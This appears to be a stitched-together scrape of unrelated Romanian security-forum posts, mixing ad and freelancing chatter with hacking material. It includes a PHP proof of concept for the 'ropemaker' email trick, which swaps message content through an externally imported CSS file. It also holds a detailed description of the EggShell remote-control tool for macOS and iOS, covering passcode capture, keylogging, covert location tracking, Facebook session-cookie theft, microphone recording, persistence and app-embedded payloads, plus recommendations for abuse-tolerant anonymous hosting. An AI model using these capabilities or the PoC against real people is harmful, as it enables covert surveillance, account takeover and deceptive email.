Leaderboard

https://www.it-sec-catalog.info/ Available from https://it-sec-catalog.info/ and https://www.gitbook.com/book/arthurgerkis/it-sec-catalog. About this project This is a catalog of links to articles on computer security — software and hardware analysis and vulnerability exploitation, shellcode development and security mitigations, including computer security research, and malware stuff. Slides are not included (there is other project for that). Advisories without much details are also not included. All articles are only in English. Project is running since 2010. Author and contributors Author of this project: Arthur (ax330d) Gerkis, contributors: Nitay Artenstein, Joe (j0echip) Chip. Thanks to everyone who helped with the project.

Pune mai multe informatii pe site, ce tip de reclame vinzi popup, bannere (+dimensiuni), de ce ar trebui sa folosim site-ul tau (gen: platim foarte rapid, modalitatile de plata), privacy policy pe prima pagina in footer ( vezi internal links), spune pe prima pagina ca revshare-ul e de 90%. + textul pe care il ai acum pare copiat. Parerea mea: esti retea care vinde reclame dar care nu stie sa se vanda

DeLux Edition: Getting root privileges on the eLux Thin Client OS Designed as a secure, streamlined environment for users to access applications such as a browser, Citrix and terminal services, the vendor describes eLux as: “… a hardware-independent operating system for cloud computing environments. It is based on a write protected file system and therefore secure against computer viruses and other malware without using special Antivirus Software. eLux® has been continuously developed and enhanced for more than 15 years." Source: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/delux-edition-getting-root-privileges-on-the-elux-thin-client-os/

Web Development Limbaje WEB: PHP, Javascript Design: Bootstrap Template engine: Smarty Editare/Fixare/Optimizare: Wordpress Framework pentru scrapere: Simple HTML Dom Informatii -Accept proiecte de lunga durata cat si cele de scurta durata. -La orice proiect or sa se stabileasca toate detaliile la inceput cu clientul, nu se pot aduce new features pe durata proiectului.(Decat mici modificari) -Support-ul este FREE in totalitate. Prin support ma refer: instalare, fixare buguri, fixare MySQL, etc. -Preturile or sa fie stabilite in functie de timpul necesar proiectului si complexitatea sa. -Accept si job-uri unde primesc salariu lunar. -Accept si job-uri in care sunt platit pe ora. Portofoliu: -Ofer live preview la proiecte in privat sau prin TeamViewer(Nu am voie sa las link-ul companiilor dar pot arata poze.) Plata -BitCoin/Etherum -PayPal -Transfer Bancar -Paysafe Contact -ICQ: MOMENTANT NEDISPONIBIL -Telegram: @adicode -Skype: adicode32@outlook.com -Jabber: adicode@404.city **Nu lasa-ti mesaje gen "ti-am dat add", "cat m-ar costa?", "poti face asta?" in topic, va rog frumos. Astept orice intrebare in PM sau pe una din retelele de mai sus. Multumesc.

Table of ContentsVisual/Mechanical Inspection 2 •Service Eligibility 2 •Swollen Battery 3 .•Display Modification 3 •Liquid Contact 4 •Debris or Corrosion 6 •Enclosure Wear 6 iPhone 6 Hardware Overview 7 iPhone 6 Plus Hardware Overview 9 iPhone 6s Hardware Overview 11 iPhone 6s Plus Hardware Overview 13 iPhone 7 Hardware Overview 15 iPhone 7 Plus Hardware Overview 17 Service Eligibility Guidelines 19 Model Numbers and Configuration Codes 20 Download: https://www.dropbox.com/s/igvowila1q317ys/070-00167-I_EN.pdf?dl=0

o noua vulnerabilitate in ceea ce priveste WPS POC

Ai vreun site pe care sa mi l propui sau doar te bagi in seama? Am spus clar ca suma este negociabila in functie de site, suma poate sa creasca sau sa scada. Ca o medie, am ales 100, iar ca sa nu fie un titlu prea lung am zis ca ofer 100. Totul ok?

Merci ca m-ai anuntat, intra milionul de mailuri

In general raspund in maxim o luna. Lasa aici nr de tel si ti-l sparge cineva.

e foarte ok pustiul si preturile sunt rezonavile.

Da, e foarte detaliat, recomand.

Merge si pe gmail dar nu cu parametrii css

Se pare ca nu prea poti aburi pe nimeni, nene. Asta nu e forum de infractori.

./ban

Jeg. Sper sa se tavaleasca in chinuri. @aelius - respectivii se pare ca nu sunt interesati, arde-l pe jegos.

M-am jucat în ultimele ore cu ropemaker şi pot să zic că nu este cine ştie ce. POC: <?php $to = "destinatar@site.tld"; $subject = "ropemaker vulnerability"; $message =<<<START <html> <head> <style type="text/css">@import "http://link_catre_extern/style.css"</style> </head> <body> I heard you are a <span id="content"></span> boy </body> </html> START; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-Transfer-Encoding: quoted-printable\r\nContent-Type: text/html; charset=UTF-8\r\n"; mail($to,$subject,$message,$headers); În fişierul CSS avem aşa: #content:after { content:"good"; } După trimiterea mailului, se poate modifica fişierul css pentru a adăuga altceva (ex. bad). Din punctul meu de vedere, vulnerabilitatea este doar o problemă la nivelul programatorilor care au creat aplicaţiile şi nu ştiu să baneze importul de fişiere CSS din extern. Sunt foarte puţine aplicaţii care nu blochează spreadsheet-urile (vulnerabilitatea mi-a mers doar pe Outlook pe Android), deci, într-o lună, două, ar trebui să avem update-uri de securitate pe ele şi ropemaker să fie de domeniul trecutului.

Brief Overview EggShell (formerly NeonEggShell) was a project I started in August of 2015. It is a remote control pentest tool written in python. After trying out Metasploits “Meterpreter”, I decided to create a better, native, secure, and easier tool with most, if not more commands for macOS And Jailbroken iOS Devices. This tool creates a bash payload what spawns a command line session with the target including extra functionality like downloading files, taking pictures, location tracking, and dozens of other commands. EggShell also has the functionality to handle and switch between multiple targets. Communication between server and target is encrypted with AES Encrypted Communication All data sent between the server and target are encrypted with 128 bit AES. This means files, pictures, and commands are encrypted end to end. The server and the payload each have a shared key that is used to encrypt the random AES key that is used for communication. The random AES key is generated each time the server script is started. Getting Started To use EggShell, you must have pycrypto and Python 2.7.x installed Install using git: (macOS/Linux) git clone https://github.com/neoneggplant/EggShell cd EggShell python eggshell.py Create And Run A Payload Using the menu, we can choose to create a bash payload, this is what will be run on the target machine. It is a 2 stage payload, it will connect to our eggshell server, download a shell script and tell our server what device it is, and then finally connect back one more time to download and execute the binary. Example: running the created payload on our target Back on our server, we can see we received a connection and an eggshell session has been started! macOS Commands ls : list contents of directory cd : change directories rm : delete file pwd : get current directory download : download file picture : take picture through iSight camera getpid : get process id openurl : open url through the default browser idletime : get the amount of time since the keyboard/cursor were touched getpaste : get pasteboard contents mic : record microphone brightness : adjust screen brightness exec : execute command persistence : attempts to connect back every 60 seconds rmpersistence : removes persistence iOS Commands sysinfo : get system information ls : list contents of directory cd : change directories rm : delete file pwd : get current directory download : download file frontcam : take picture through front camera backcam : take picture through back camera mic : record microphone getpid : get process id vibrate : make device vibrate alert : make alert show up on device say : make device speak locate : get device location respring : respring device setvol : set mediaplayer volume getvol : view mediaplayer volume isplaying : view mediaplayer info openurl : open url on device dial : dial number on device battery : get battery level listapps : list bundle identifiers open : open app persistence : installs LaunchDaemon – tries to connect every 30 seconds rmpersistence : uninstalls LaunchDaemon installpro : installs eggshellpro to device EggShellPro Commands (Cydia Substrate Extension) lock : simulate lock button press wake : wake device from sleeping state home : simulate home button press doublehome : simulate home button double press play : plays music pause : pause music next : next track prev : previous track getpasscode : log successfull passcode attempts unlock : unlock with passcode keylog : log keystrokes keylogclear : clear keylog data locationservice: turn on or off location services EggShell Pro EggShell Pro is a Cydia substrate library that takes advantage of the the system functions in iOS. With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is being able to log the passcode that the iPhone has used to be unlocked with. When interacting with an iOS Device, simply run “installpro” and the dylib file will upload to the device followed by a respring. Navigating/Downloading Files EggShell has a command line interface like feel to it. Using the unix like commands built into eggshell, we can print working directory (pwd), directory listing (ls), remove files (rm), and change directories (cd). Using these commands we can easily navigate the file system just like the command line. Using the download command we can download any file securely over our encrypted connection. In the example below, we go through a directory and download a pdf file on the target machine. Taking Pictures Taking a photo with the “picture” command on macOS will active the iSight camera and send the image data back to the server. To take a picture on iOS use the “frontcam” or “backcam” iOS Location Tracking Even With Location Services Off EggShellPro lets us send commands to toggle location services on or off. This means even if location services are off, we can turn them on, retrieve the location of the device, and then quickly turn location services off. We get location coordinates of the exact spot the device is currently in and also a convenient link to google maps. iOS Getting Passcode EggshellPro hooks into lock screen functions and logs any success the devices passcode in memory. When we run “getpasscode” we are sent back the passcode that was used last to unlock the device. macOS Hijacking Safari Facebook Sessions With the command getfacebook, there is a special function in eggshell that parses through binary cookies from safari. Due to safari binary cookies being unencrypted, we can easily leak the Facebook c_user and xs cookies and use it to login on another browser. macOS Persistence To achieve persistence, even without being root, the command “persistence” adds the payload to the crontab file. It attempts to re-connect every 60 seconds even after a reboot. To remove persistence, simply enter “rmpersistence” and it should remove itself from crontab. Recording Audio Using the “mic record” command, we can asynchronously record audio on both iOS and macOS. This means we can record through the mic while running other commands. When we are finished recording, simply run “mic stop”, this will stop the recording of audio and download the audio data. Handling Multiple Sessions With the built in feature “MultiServer”, we can listen for multiple connections. Below is an example with 2 connections on the same device, however this can be done with multiple devices. As we connect to targets, we can use “sessions” to list all the active sessions, “interact” to interact with a session, “close” session numbers, and “back” to go back to the multiserver console Payloads In Apps Payloads can easily be added inside of apps. Below is an example of using the “system()” function to call our payload, still in just one line! This method can be used on both macOS and jailbroken iOS Immediately after running the app, our payload is run and just as expected, we have a connection Safari Exploit + EggShell Soon after iOS security researcher Luca Todesco released his browser based 9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from safari. Below is my video demonstration featured on EverythingApplePro Original Video Thanks For Viewing lucasjackson5815@gmail.com Download: EggShell-master.zip Source: http://lucasjackson.me/index.php/eggshell/

la mama in podul casei, prin hambar ....

Depinde ce vrei sa faci. Sunt dedicate si vps-uri in Iran cu plata bitcoin, trafic routat prin Rusia si la T&Cs au interzis doar DDoS, malware, spam si child porn.

Anonymous domain registration: https://njal.la/ pentru domenii, altii: http://www.gandi.net http://nic.ru http://prq.se Hosting: https://masterhost.ru/ http://abusehosting.net/ http://www.2x4.ru/index.php https://www.shinjiru.com/ https://sweb.ru/ http://zservers.ru/ https://jino.ru/ Recomand sollhost: Sales Jabber: webhost@jabberim.org hostmgr@pubchat.im Jabber: sollhost@jabbix.ru o lectura interesanta: https://www.informatics.indiana.edu/xw7/papers/alrwais2017under.pdf

Ce s-a intamplat?Nu e bun contul lui?